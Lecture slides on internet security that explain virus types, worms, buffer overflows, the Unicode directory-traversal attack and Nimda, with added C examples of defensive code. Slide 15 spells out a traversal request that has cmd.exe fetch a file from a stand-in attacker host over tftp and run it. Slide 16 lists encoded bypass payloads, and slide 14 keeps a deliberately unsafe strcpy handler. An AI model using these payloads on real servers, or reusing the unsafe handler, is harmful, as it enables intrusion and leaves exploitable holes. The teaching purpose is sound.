1
Security on the Internet Norman White ©2001
2
Security: what is it?
Confidentiality: can my information be stolen, i.e. read by someone who should not see it?
Integrity: can it be changed or destroyed without my knowledge?
Availability: will my information always be available when I need it?
3
Confidentiality: how do I keep my data protected from prying eyes?
Physical protection: protect systems, backup tapes, networks, etc. It is hard to defend against every possible attack.
Encryption: keep my data in a form that only I (and whoever holds the key) can read. Keys are hard to distribute, encrypted data is harder to process, and the data is still not immune to decryption if the key is weak or leaked or the algorithm is broken.
Need both physical protection and encryption.
4
Integrity: what do we do if someone just wants to destroy or alter our data? Hackers, competitors, etc.
Backups: need sophisticated backup policies, with copies that are tested and kept off-line or off-site so the same attacker cannot destroy them too.
Vigilance: need to keep track of security updates and apply them.
Procedures: need to have policies and procedures in place that deter security violations.
5
Availability: what can I do about Denial of Service (DoS) attacks?
Need network infrastructure protection.
Routers and filters that reject typical DoS traffic.
Distributed servers on different networks that can take over for each other.
What about virus attacks?
6
Client security: what are the common ways client workstations get infected?
7
Some viruses: boot sector viruses
Boot sector viruses infect the boot sector or partition table of a disk. Systems are most likely to be attacked by a boot sector virus when they are booted with an infected floppy disk in the drive; the boot attempt does not have to succeed for the virus to infect the hard drive. A few viruses can also infect the boot sector from executable programs; these are known as multipartite viruses and are relatively rare. Once the system is infected, the boot sector virus will attempt to infect every disk accessed by that computer. In general, boot sector viruses can be successfully removed.
8
ActiveX viruses (ActiveX malicious code)
ActiveX controls allow Web developers to create interactive, dynamic Web pages with broader functionality. An ActiveX control is a component object embedded in a Web page that runs automatically when the page is viewed, as native code with the privileges of the user running the browser. In many cases the browser can be configured so that ActiveX controls do not execute, by raising the browser's security setting to "high". However, hackers, virus writers, and others who wish to cause mischief or worse may use malicious ActiveX code as a vehicle to attack the system. To remove a malicious ActiveX control, delete it; whatever it did while it ran (files dropped, settings changed) must be cleaned up separately.
9
Macro viruses
Macro viruses use another application's macro programming language to distribute themselves. They infect documents such as MS Word or MS Excel files. Unlike other viruses, macro viruses do not infect programs or boot sectors directly, although a few do drop programs onto the user's hard drive, and those dropped files may in turn infect executable programs or boot sectors.
10
Script viruses (VBScript, JavaScript, HTML)
Script viruses are written in scripting languages such as VBScript and JavaScript. VBScript (Visual Basic Script) and JavaScript viruses make use of Microsoft's Windows Scripting Host to activate themselves and infect other files. Since Windows Scripting Host is installed on Windows 98 and Windows 2000, such a virus can be activated simply by double-clicking a *.vbs or *.js file in Windows Explorer. HTML viruses use scripts embedded in HTML files to do their damage; these embedded scripts execute automatically the moment the page is viewed in a script-enabled browser.
11
Worm
A computer worm is a self-contained program (or set of programs) that is able to spread functional copies of itself, or of its segments, to other computer systems. Propagation usually takes place over network connections or via e-mail attachments. To get rid of a worm you delete the program, and close the hole it used to get in; otherwise it will be back.
12
How are servers infected?
Overflow techniques: the infecting program sends a request that is too large for the server to handle. Some parameter the server program expects is crafted so that it overruns the buffer meant to hold it and breaks the program in a way that hands control to the attacker's data.
Executing known programs to get command control: tricking the server into running a program that is already on the machine, such as a command interpreter.
13
Overflow example: Unix lpd
Send the Unix server an lpd (line printer daemon) request that is too long. The parameters overflow lpd's buffer into adjacent memory, including the saved return address, so execution jumps into the attacker's data. lpd runs as root, so the worm gains root control of the machine. The worm then initiates a file transfer of the rest of itself, and starts scanning for other machines to break into.
14
Overflow techniques
Virtually any remotely reachable capability can be broken into this way if the code does not validate parameter lengths before copying them into fixed-size buffers.
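As an added example (not from the original slides, and not lpd's code), here is the pattern in C: a request handler that copies a parameter into a fixed-size stack buffer without checking its length, beside a version that validates the length first. The daemon, the buffer size QUEUE_NAME_MAX and the function names are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed illustration, not lpd's code: a daemon copies a request
 * parameter (a printer queue name) into a fixed-size stack buffer.
 * QUEUE_NAME_MAX and the function names are invented for the example. */
#define QUEUE_NAME_MAX 32

/* Vulnerable: no length check.  A request of 32 or more bytes writes
 * past 'queue' into whatever follows it on the stack (saved registers,
 * the return address), which is how attacker-supplied bytes end up
 * being executed.  Never call this with untrusted input. */
int handle_request_unsafe(const char *request)
{
    char queue[QUEUE_NAME_MAX];
    strcpy(queue, request);             /* overflows when strlen(request) >= 32 */
    return (int)strlen(queue);
}

/* Hardened: validate the length first, reject anything that does not
 * fit together with its terminating NUL, then copy with an explicit
 * bound.  Returns the parameter length, or -1 if it was rejected. */
int handle_request_safe(const char *request, char *out, size_t out_len)
{
    size_t n = strlen(request);
    if (n >= out_len)                   /* no room for the NUL terminator */
        return -1;
    memcpy(out, request, n + 1);
    return (int)n;
}

/* Wrapper exercising the safe handler with a buffer of the daemon's size. */
int accept_queue_name(const char *request)
{
    char queue[QUEUE_NAME_MAX];
    return handle_request_safe(request, queue, sizeof queue);
}

int main(void)
{
    char long_request[200];
    memset(long_request, 'A', sizeof long_request - 1);
    long_request[sizeof long_request - 1] = '\0';

    printf("short request accepted, length %d\n", accept_queue_name("lp0"));
    printf("long request result: %d (rejected)\n", accept_queue_name(long_request));
    /* handle_request_unsafe(long_request) would corrupt the stack here. */
    return 0;
}
```

The fix is the ordering: the length is checked against the destination size before a single byte is copied, and the caller learns that the request was rejected rather than silently truncated.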
15
Unicode problems
Basic technique: send the web server a request of the form GET ..\..\cmd.exe tftp badfile badserver hackedserver. The ..\ sequences walk out of the web root to the command interpreter, which is then used to pull badfile from the attacker's machine (badserver) onto the hacked server with tftp. Then issue a command GET badfile.exe parameters... Voila, the hacker just broke in, dropped badfile on the hacked system, and ran it.
Solution (first attempt): don't allow the "\" character in the command string.
16
Unicode 2
So... the hacker now sends GET ..%2f..%2fcmd.exe tftp etc. %2f is the URL-encoded form of the "/" separator (%5c is "\"), and the Windows web server also accepted overlong Unicode (UTF-8) encodings such as %c0%af for the same character. The server does not see the "\" or "/" when it checks the request, but expands the escape into a path separator before it executes the command. Once servers started decoding before checking, hackers switched to the encoded representation of %2f itself (%252f), which decodes to %2f on the first pass and only becomes "/" on a second decoding pass.
Solution: canonicalize fully (decode until nothing changes, reject invalid or overlong encodings), then check. Never check before expansion.
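As an added example (not from the original slides, and not any web server's code), here is the decode-then-check rule in C. is_traversal_before_decode looks for "../" or "..\" in the raw request, the order the slides describe as broken; is_traversal_after_decode percent-decodes until nothing changes, rejects anything that is not canonical or not valid UTF-8 (which catches overlong forms such as %c0%af), and only then looks for a ".." path segment. The function names and the sample paths are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not IIS code: function names and sample paths are
 * constructed for illustration. */

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* One pass of %XX decoding.  Returns bytes written, or -1 on a malformed
 * escape, an encoded NUL, or output overflow. */
static int percent_decode_once(const char *in, unsigned char *out, size_t out_len)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        int b = (unsigned char)in[i];
        if (in[i] == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)in[i + 2]);
            if (lo < 0) return -1;
            b = hi * 16 + lo;
            if (b == 0) return -1;      /* %00 would truncate the path */
            i += 2;
        }
        if (o + 1 >= out_len) return -1;
        out[o++] = (unsigned char)b;
    }
    out[o] = '\0';
    return (int)o;
}

/* Strict UTF-8 check: rejects stray continuation bytes and overlong
 * forms such as C0 AF, which lenient decoders map to '/'.  (Surrogate
 * code points are not checked, to keep the example short.) */
static int valid_utf8(const unsigned char *s, size_t n)
{
    for (size_t i = 0; i < n;) {
        unsigned char c = s[i];
        size_t len; unsigned char min2 = 0x80;
        if (c < 0x80) { i++; continue; }
        if (c >= 0xC2 && c <= 0xDF) len = 2;
        else if (c == 0xE0) { len = 3; min2 = 0xA0; }
        else if (c >= 0xE1 && c <= 0xEF) len = 3;
        else if (c == 0xF0) { len = 4; min2 = 0x90; }
        else if (c >= 0xF1 && c <= 0xF4) len = 4;
        else return 0;                  /* C0, C1, F5..FF never start a sequence */
        if (i + len > n || s[i + 1] < min2 || s[i + 1] > 0xBF) return 0;
        for (size_t k = 2; k < len; k++)
            if (s[i + k] < 0x80 || s[i + k] > 0xBF) return 0;
        i += len;
    }
    return 1;
}

/* Broken order: inspect the raw request, decode later.  Misses ..%2f. */
int is_traversal_before_decode(const char *path)
{
    return strstr(path, "../") != NULL || strstr(path, "..\\") != NULL;
}

/* Fixed order: decode until nothing changes (bounded), reject what is
 * not canonical or not valid UTF-8, then check.  1 = escapes the root,
 * 0 = clean, -1 = malformed (reject). */
int is_traversal_after_decode(const char *path)
{
    unsigned char buf[2][512];
    int cur = 0, n = percent_decode_once(path, buf[0], sizeof buf[0]);
    if (n < 0) return -1;
    for (int round = 0; round < 4 && memchr(buf[cur], '%', n); round++) {
        n = percent_decode_once((const char *)buf[cur], buf[cur ^ 1], sizeof buf[0]);
        if (n < 0) return -1;
        cur ^= 1;
    }
    if (memchr(buf[cur], '%', n) || !valid_utf8(buf[cur], n)) return -1;
    for (int i = 0; i < n; i++)         /* Windows treats '\' as '/' */
        if (buf[cur][i] == '\\') buf[cur][i] = '/';
    for (const char *p = (const char *)buf[cur];;) {
        size_t len = strcspn(p, "/");
        if (len == 2 && p[0] == '.' && p[1] == '.') return 1;
        if (p[len] == '\0') return 0;
        p += len + 1;
    }
}

int main(void)
{
    const char *p = "/scripts/..%2f..%2fcmd.exe";
    printf("%s -> raw check %d, canonical check %d\n", p,
           is_traversal_before_decode(p), is_traversal_after_decode(p));
    return 0;
}
```

Two design points carry the lesson. Decoding is repeated to a fixed point with a small bound, so a double-encoded %252f is caught and a pathological input cannot make the server loop; and a request that still contains an escape, or decodes to an overlong sequence, is rejected outright rather than guessed at, because a lenient decoder later in the pipeline is exactly what the attacker is counting on.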
17
File-sharing problems
Open network file shares allow a hacker to drop infected files onto a user's system, where they wait for the user to execute them.
18
Example: Nimda
Did all of the above:
Used the Unicode directory-traversal trick to break into web servers.
Used e-mailed scripts to break into clients.
Infected all open file shares.
Used back doors left behind by earlier Trojan horses and worms.
19
Management takeaway
Security is very important.
Assume you will be broken into; have a plan.
Monitor attacks constantly.
Keep systems up to date.
Configure firewalls, etc., to control traffic.
Partition off external systems.
Watch out for users accessing from home; it extends your exposure to their machines.